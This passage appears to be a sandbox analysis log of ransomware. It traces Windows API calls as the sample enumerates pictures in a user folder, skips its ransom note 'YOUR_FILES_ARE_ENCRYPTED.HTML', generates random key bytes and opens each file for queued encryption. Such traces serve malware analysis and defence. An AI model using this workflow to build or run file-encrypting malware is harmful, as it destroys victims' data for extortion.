lpOverlapped=0x3340008) returned 1 [0125.037] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f0538f0, ftCreationTime.dwHighDateTime=0x1d7087b, ftLastAccessTime.dwLowDateTime=0x1ac39320, ftLastAccessTime.dwHighDateTime=0x1d709be, ftLastWriteTime.dwLowDateTime=0x1ac39320, ftLastWriteTime.dwHighDateTime=0x1d709be, nFileSizeHigh=0x0, nFileSizeLow=0xa6ed, dwReserved0=0x19ec60, dwReserved1=0x2125281, cFileName="AZJ2s3YFVbXw.gif", cAlternateFileName="AZJ2S3~1.GIF")) returned 1 [0125.037] StrStrIW (lpFirst="AZJ2s3YFVbXw.gif", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.037] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\AZJ2s3YFVbXw.gif") returned 71 [0125.037] PathFindExtensionW (pszPath="AZJ2s3YFVbXw.gif") returned=".gif" [0125.037] lstrlenW (lpString=".gif") returned 4 [0125.037] PathFindExtensionW (pszPath="AZJ2s3YFVbXw.gif") returned=".gif" [0125.037] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0125.037] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\AZJ2s3YFVbXw.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\8jyygxllescuozkst_1\\azj2s3yfvbxw.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.038] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=42733) returned 1 [0125.038] GetProcessHeap () returned 0x600000 [0125.038] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.038] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="F0") returned 2 [0125.038] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="99") returned 2 [0125.038] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="9A") returned 2 [0125.038] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="56") returned 2 [0125.038] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="BE") returned 2 [0125.038] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="65") returned 2 [0125.039] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="4F") returned 2 [0125.039] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="90") returned 2 [0125.039] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="BC") returned 2 [0125.039] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="11") returned 2 [0125.039] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="B0") returned 2 [0125.039] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="07") returned 2 [0125.039] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="FE") returned 2 [0125.039] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="56") returned 2 [0125.039] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="45") returned 2 [0125.039] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="FA") returned 2 [0125.039] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="42") returned 2 [0125.039] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="8A") returned 2 [0125.039] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="0F") returned 2 [0125.039] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="C5") returned 2 [0125.039] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="D0") returned 2 [0125.039] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="DE") returned 2 [0125.039] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="D6") returned 2 [0125.039] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="89") returned 2 [0125.039] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="9A") returned 2 [0125.039] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="70") returned 2 [0125.039] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="D6") returned 2 [0125.039] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="86") returned 2 [0125.039] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="94") returned 2 [0125.039] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="1F") returned 2 [0125.039] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="D1") returned 2 [0125.039] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="33") returned 2 [0125.040] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\AZJ2s3YFVbXw.gif" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\AZJ2s3YFVbXw.gif") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\AZJ2s3YFVbXw.gif" [0125.040] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.040] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.044] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb089fad0, ftCreationTime.dwHighDateTime=0x1d704ea, ftLastAccessTime.dwLowDateTime=0x12d976f0, ftLastAccessTime.dwHighDateTime=0x1d70934, ftLastWriteTime.dwLowDateTime=0x12d976f0, ftLastWriteTime.dwHighDateTime=0x1d70934, nFileSizeHigh=0x0, nFileSizeLow=0xff1, dwReserved0=0x19ec60, dwReserved1=0x2125281, cFileName="BMpO5L_W.gif", cAlternateFileName="")) returned 1 [0125.044] StrStrIW (lpFirst="BMpO5L_W.gif", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.044] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\BMpO5L_W.gif") returned 67 [0125.044] PathFindExtensionW (pszPath="BMpO5L_W.gif") returned=".gif" [0125.044] lstrlenW (lpString=".gif") returned 4 [0125.044] PathFindExtensionW (pszPath="BMpO5L_W.gif") returned=".gif" [0125.044] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0125.044] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\BMpO5L_W.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\8jyygxllescuozkst_1\\bmpo5l_w.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.045] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=4081) returned 1 [0125.045] GetProcessHeap () returned 0x600000 [0125.045] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.047] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="72") returned 2 [0125.047] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="99") returned 2 [0125.047] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="5E") returned 2 [0125.047] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="15") returned 2 [0125.047] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="6F") returned 2 [0125.047] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="9C") returned 2 [0125.047] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="3A") returned 2 [0125.047] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="EC") returned 2 [0125.047] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="F8") returned 2 [0125.047] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="5F") returned 2 [0125.047] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="8F") returned 2 [0125.047] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="84") returned 2 [0125.047] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="83") returned 2 [0125.047] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="EE") returned 2 [0125.047] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="4C") returned 2 [0125.047] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="F4") returned 2 [0125.048] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="47") returned 2 [0125.048] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="C8") returned 2 [0125.048] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="1E") returned 2 [0125.048] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="86") returned 2 [0125.048] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="2D") returned 2 [0125.048] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="23") returned 2 [0125.048] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="2D") returned 2 [0125.048] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="C6") returned 2 [0125.048] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="22") returned 2 [0125.048] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="62") returned 2 [0125.048] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="0C") returned 2 [0125.048] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="6B") returned 2 [0125.048] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="97") returned 2 [0125.048] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="42") returned 2 [0125.048] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="24") returned 2 [0125.048] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="6B") returned 2 [0125.048] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\BMpO5L_W.gif" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\BMpO5L_W.gif") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\BMpO5L_W.gif" [0125.048] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.049] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.052] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x550e17c0, ftCreationTime.dwHighDateTime=0x1d6fb0a, ftLastAccessTime.dwLowDateTime=0xec5ca870, ftLastAccessTime.dwHighDateTime=0x1d7029f, ftLastWriteTime.dwLowDateTime=0xec5ca870, ftLastWriteTime.dwHighDateTime=0x1d7029f, nFileSizeHigh=0x0, nFileSizeLow=0xaa49, dwReserved0=0x19ec60, dwReserved1=0x2125281, cFileName="bRklnnBk.gif", cAlternateFileName="")) returned 1 [0125.052] StrStrIW (lpFirst="bRklnnBk.gif", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.052] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\bRklnnBk.gif") returned 67 [0125.052] PathFindExtensionW (pszPath="bRklnnBk.gif") returned=".gif" [0125.052] lstrlenW (lpString=".gif") returned 4 [0125.052] PathFindExtensionW (pszPath="bRklnnBk.gif") returned=".gif" [0125.052] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0125.052] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\bRklnnBk.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\8jyygxllescuozkst_1\\brklnnbk.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.053] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=43593) returned 1 [0125.053] GetProcessHeap () returned 0x600000 [0125.053] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.054] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="C9") returned 2 [0125.054] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="3D") returned 2 [0125.054] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="F9") returned 2 [0125.054] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="D3") returned 2 [0125.054] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="54") returned 2 [0125.054] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="40") returned 2 [0125.054] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="96") returned 2 [0125.054] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="AF") returned 2 [0125.054] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="13") returned 2 [0125.054] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="21") returned 2 [0125.054] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="22") returned 2 [0125.054] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="92") returned 2 [0125.054] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="9A") returned 2 [0125.054] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="CA") returned 2 [0125.054] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="D7") returned 2 [0125.054] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="34") returned 2 [0125.054] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="F5") returned 2 [0125.054] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="37") returned 2 [0125.054] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="62") returned 2 [0125.054] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="5D") returned 2 [0125.054] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="FC") returned 2 [0125.054] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="31") returned 2 [0125.054] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="AE") returned 2 [0125.054] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="DD") returned 2 [0125.054] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="41") returned 2 [0125.054] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="3B") returned 2 [0125.054] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="AB") returned 2 [0125.054] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="41") returned 2 [0125.054] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="56") returned 2 [0125.055] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="7A") returned 2 [0125.055] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="7D") returned 2 [0125.055] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="0A") returned 2 [0125.055] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\bRklnnBk.gif" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\bRklnnBk.gif") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\bRklnnBk.gif" [0125.055] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.055] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.068] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a490b0, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdd015b0, ftLastAccessTime.dwHighDateTime=0x1d7086c, ftLastWriteTime.dwLowDateTime=0xdd015b0, ftLastWriteTime.dwHighDateTime=0x1d7086c, nFileSizeHigh=0x0, nFileSizeLow=0x7719, dwReserved0=0x19ec60, dwReserved1=0x2125281, cFileName="CfFFw49ps55T_yZ_Hc.jpg", cAlternateFileName="CFFFW4~1.JPG")) returned 1 [0125.068] StrStrIW (lpFirst="CfFFw49ps55T_yZ_Hc.jpg", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.068] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\CfFFw49ps55T_yZ_Hc.jpg") returned 77 [0125.068] PathFindExtensionW (pszPath="CfFFw49ps55T_yZ_Hc.jpg") returned=".jpg" [0125.069] lstrlenW (lpString=".jpg") returned 4 [0125.069] PathFindExtensionW (pszPath="CfFFw49ps55T_yZ_Hc.jpg") returned=".jpg" [0125.069] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0125.069] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\CfFFw49ps55T_yZ_Hc.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\8jyygxllescuozkst_1\\cfffw49ps55t_yz_hc.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.069] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=30489) returned 1 [0125.069] GetProcessHeap () returned 0x600000 [0125.069] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.072] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="BC") returned 2 [0125.072] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="4A") returned 2 [0125.072] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="05") returned 2 [0125.072] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="DE") returned 2 [0125.072] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="B1") returned 2 [0125.072] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="C4") returned 2 [0125.072] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="B0") returned 2 [0125.072] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="E7") returned 2 [0125.072] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="C2") returned 2 [0125.072] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="5D") returned 2 [0125.072] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="7A") returned 2 [0125.072] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="54") returned 2 [0125.072] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="4E") returned 2 [0125.072] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="00") returned 2 [0125.072] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="15") returned 2 [0125.072] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="0A") returned 2 [0125.072] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="7E") returned 2 [0125.072] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="33") returned 2 [0125.072] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="E0") returned 2 [0125.072] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="FB") returned 2 [0125.072] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="FB") returned 2 [0125.072] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="B1") returned 2 [0125.072] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="02") returned 2 [0125.072] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="16") returned 2 [0125.072] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="63") returned 2 [0125.072] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="14") returned 2 [0125.072] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="E6") returned 2 [0125.072] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="96") returned 2 [0125.073] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="DD") returned 2 [0125.073] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="D5") returned 2 [0125.073] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="87") returned 2 [0125.073] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="2E") returned 2 [0125.073] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\CfFFw49ps55T_yZ_Hc.jpg" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\CfFFw49ps55T_yZ_Hc.jpg") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\CfFFw49ps55T_yZ_Hc.jpg" [0125.073] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.073] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.078] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2045a190, ftCreationTime.dwHighDateTime=0x1d7067a, ftLastAccessTime.dwLowDateTime=0x2b4ade0, ftLastAccessTime.dwHighDateTime=0x1d706bd, ftLastWriteTime.dwLowDateTime=0x2b4ade0, ftLastWriteTime.dwHighDateTime=0x1d706bd, nFileSizeHigh=0x0, nFileSizeLow=0x66a0, dwReserved0=0x19ec60, dwReserved1=0x2125281, cFileName="FFm1TKgH mMhVT.png", cAlternateFileName="FFM1TK~1.PNG")) returned 1 [0125.078] StrStrIW (lpFirst="FFm1TKgH mMhVT.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.078] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\FFm1TKgH mMhVT.png") returned 73 [0125.078] PathFindExtensionW (pszPath="FFm1TKgH mMhVT.png") returned=".png" [0125.078] lstrlenW (lpString=".png") returned 4 [0125.078] PathFindExtensionW (pszPath="FFm1TKgH mMhVT.png") returned=".png" [0125.078] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0125.078] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\FFm1TKgH mMhVT.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\8jyygxllescuozkst_1\\ffm1tkgh mmhvt.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.079] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=26272) returned 1 [0125.079] GetProcessHeap () returned 0x600000 [0125.079] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.080] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="73") returned 2 [0125.080] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="CE") returned 2 [0125.080] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="3C") returned 2 [0125.080] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="0A") returned 2 [0125.080] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="A0") returned 2 [0125.080] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="86") returned 2 [0125.080] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="A3") returned 2 [0125.080] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="EC") returned 2 [0125.080] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="61") returned 2 [0125.080] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="16") returned 2 [0125.080] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="F3") returned 2 [0125.080] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="32") returned 2 [0125.080] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="E2") returned 2 [0125.080] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="F6") returned 2 [0125.080] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="8A") returned 2 [0125.080] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="6D") returned 2 [0125.080] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="FA") returned 2 [0125.080] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="F3") returned 2 [0125.080] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="74") returned 2 [0125.080] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="3C") returned 2 [0125.080] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="F5") returned 2 [0125.080] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="0A") returned 2 [0125.080] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="22") returned 2 [0125.080] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="E5") returned 2 [0125.080] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="B8") returned 2 [0125.080] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="FA") returned 2 [0125.080] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="76") returned 2 [0125.080] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="BB") returned 2 